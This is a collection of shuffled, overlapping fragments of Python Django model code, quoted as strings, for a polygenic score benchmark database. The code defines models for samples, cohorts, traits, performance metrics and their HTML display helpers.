Metric Name (Short)',", "max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500)", "class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list", "{} {}' # Estimate e = '' if self.estimate != None: e +=", "in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type])))", "# Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit", "= [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data", "desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error',", "models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to", "{} for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for", "(m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None", "!= None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci':", "max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding,", "{}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e += 
'", "'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list =", "months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range')", "Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms =", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self,", "list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for", "class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list", "if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None", "to describe the International Classification of Diseases used in PGS \"\"\" id =", "%s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self):", "''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time)", "= {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type", "#def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self):", "def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self):", "= self.variability # Unit if 
self.unit != None: l['unit'] = self.unit return l", "# return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list", "on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry", "# return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data =", "blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error", "# return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' |", "terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s", "ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100,", "} if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples", "perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics", "models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. 
standard deviation", "+= str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range != None", "= '' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels) #", "not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: #", "if metrics: l = [] for m in metrics: if (m.type == metric_type):", "describe samples used in variant associations and PGS training/testing\"\"\" # Sample Information ##", "(Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units", "= self.category_list # if len(categories) > 0: # return [x.label for x in", "Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time", "self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit']", "score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS", "for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list =", "self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id =", "[] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l)", "'%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if", "class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa 
fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring", "else: return '' def display_values_dict(self): l = {} # Estimate estimate = ''", "display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s =", "of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID',", "None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None", "self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries']", "othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type):", "used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort", "null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. 
Confidence interval (ci), range,", "None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases !=", "str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if", "'' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class", "cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples'])", "return '' def display_values_dict(self): l = {} # Estimate estimate = '' if", "'' # if len(categories) > 0: # category_labels = [] # for category", "# else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list #", "count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not", "+= '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci':", "e = '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate)", "= None if '[' not in e: if self.range != None: type_desc =", "self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value':", "None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if", "else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for", "class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring 
+= '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls", "null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry", "elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l =", "metrics = self.performance_metric.all() if metrics: l = [] for m in metrics: if", "individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>'", "(self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False):", "on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return", "class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = []", "Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi',", "return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def", "in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return", "othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list", "single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = 
models.CharField('Ontology Trait", "information related to controlled trait vocabulary (mainly to link multiple EFO to a", "= models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True)", "!= None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] =", "] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric", "associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of", "sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True)", "perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size", "'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list", "(PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional =", "models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import", "helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v !=", "(iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100,", "null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', 
on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True)", "used in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number", "None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a", "100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring", "categories_data = '' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels)", "None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {}", "') # else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: #", "cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full =", "%s'%(self.name, s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci)", "#source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed", "count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance", "sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">,", "models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s |", "#source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort,", "self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return", "= self.category_labels_list 
# categories_data = '' # if len(category_labels) > 0: # categories_data", "French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry", "'{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name,", "== 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) >", "= self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0],", "self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value':", "| %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def", "of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label", "verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short)", "of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\")", "return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s = '{}", "max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort", "= models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class", "('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric',", "vocabulary (mainly to link multiple EFO to a 
single score)\"\"\" id = models.CharField('Ontology", "else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in", "display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data", "self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None", "followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100)", "PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)])", "Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe", "if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return", "(type)', max_length=100, default='range') # e.g. 
Confidence interval (ci), range, interquartile range (iqr), open", "label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model):", "return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self):", "or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional", "return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value", "'' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return", "sstring = '' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases", "# Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases =", "class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def", "@property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a", "= [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type", "return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR',", "models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code", "sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases,", "[ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other 
Metric') ] type =", "{}' no_helptip = '{} : {} {}' # Estimate e = '' if", "type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in", "if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used", "display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">:", "else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label)", "in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self,", "class to hold information related to controlled trait vocabulary (mainly to link multiple", "phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label)", "self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property", "def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse metric", "if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data #@property", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for", "div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: 
percent_cases = ''", "effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se", "= [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{}", "[] # for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels)", "to hold information related to controlled trait vocabulary (mainly to link multiple EFO", "sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return", "def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s", "to describe Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\"", "else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l)", "effect', null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci)", "else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else:", "display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free)", "class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list:", "null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g.", "l = [] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value()))", "None: l.append(v) # Range r = None if '[' not in e: if", "if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): #", "class_acc[1]}) perf_metrics['class_acc'] = class_acc_data 
othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for", "DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval", "= models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci != None:", "score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label',", "class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if", "= models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range", "metric type, name, value and confidence intervals of a performance metric\"\"\" performance =", "no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1): return", "type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r", "DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def", "settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class", "str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r)", "filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l = []", "verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad 
= models.CharField('Broad Ancestry", "class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels':", "= '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name, self.name)", "models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url =", "self.category_labels_list # categories_data = '' # if len(category_labels) > 0: # categories_data =", "#print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] =", "hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit !=", "self.synonyms: # return self.synonyms.split(' | ') # else: # return [] #@property #def", "sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait", "' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) #", "hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return", "self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), 
self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(),", "style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe", "to hold metric type, name, value and confidence intervals of a performance metric\"\"\"", "type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v", "from django.db import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator", "= [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes']", "'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class", "[x.label for x in categories] # else: # return [] #@property #def category_labels(self):", "range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g.", "and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance", "{}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number)", "for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if", "key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories)", "sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) 
sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls", "if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range),", "class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring +=", "{} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in", "metrics for a PGS and a set of samples\"\"\" # Links to related", "models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self):", "max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts", "self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data =", "None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability", "for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort',", "max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort", "= None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v =", "l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' }", "category_labels_list(self): # categories = self.category_list # if len(categories) > 0: # return [x.label", "= othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract 
and", "uses less SQL queries than filtering directly on the queryset metrics = self.performance_metric.all()", "format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if", "max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment',", "y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories) > 0:", "if self.synonyms: # return self.synonyms.split(' | ') # else: # return [] #@property", "'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()]", "ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used", "if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click", "= models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\"", "return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip = '<span", "othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\"", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad)", "models.TextField('Synonyms', null=True) #mapped_terms = 
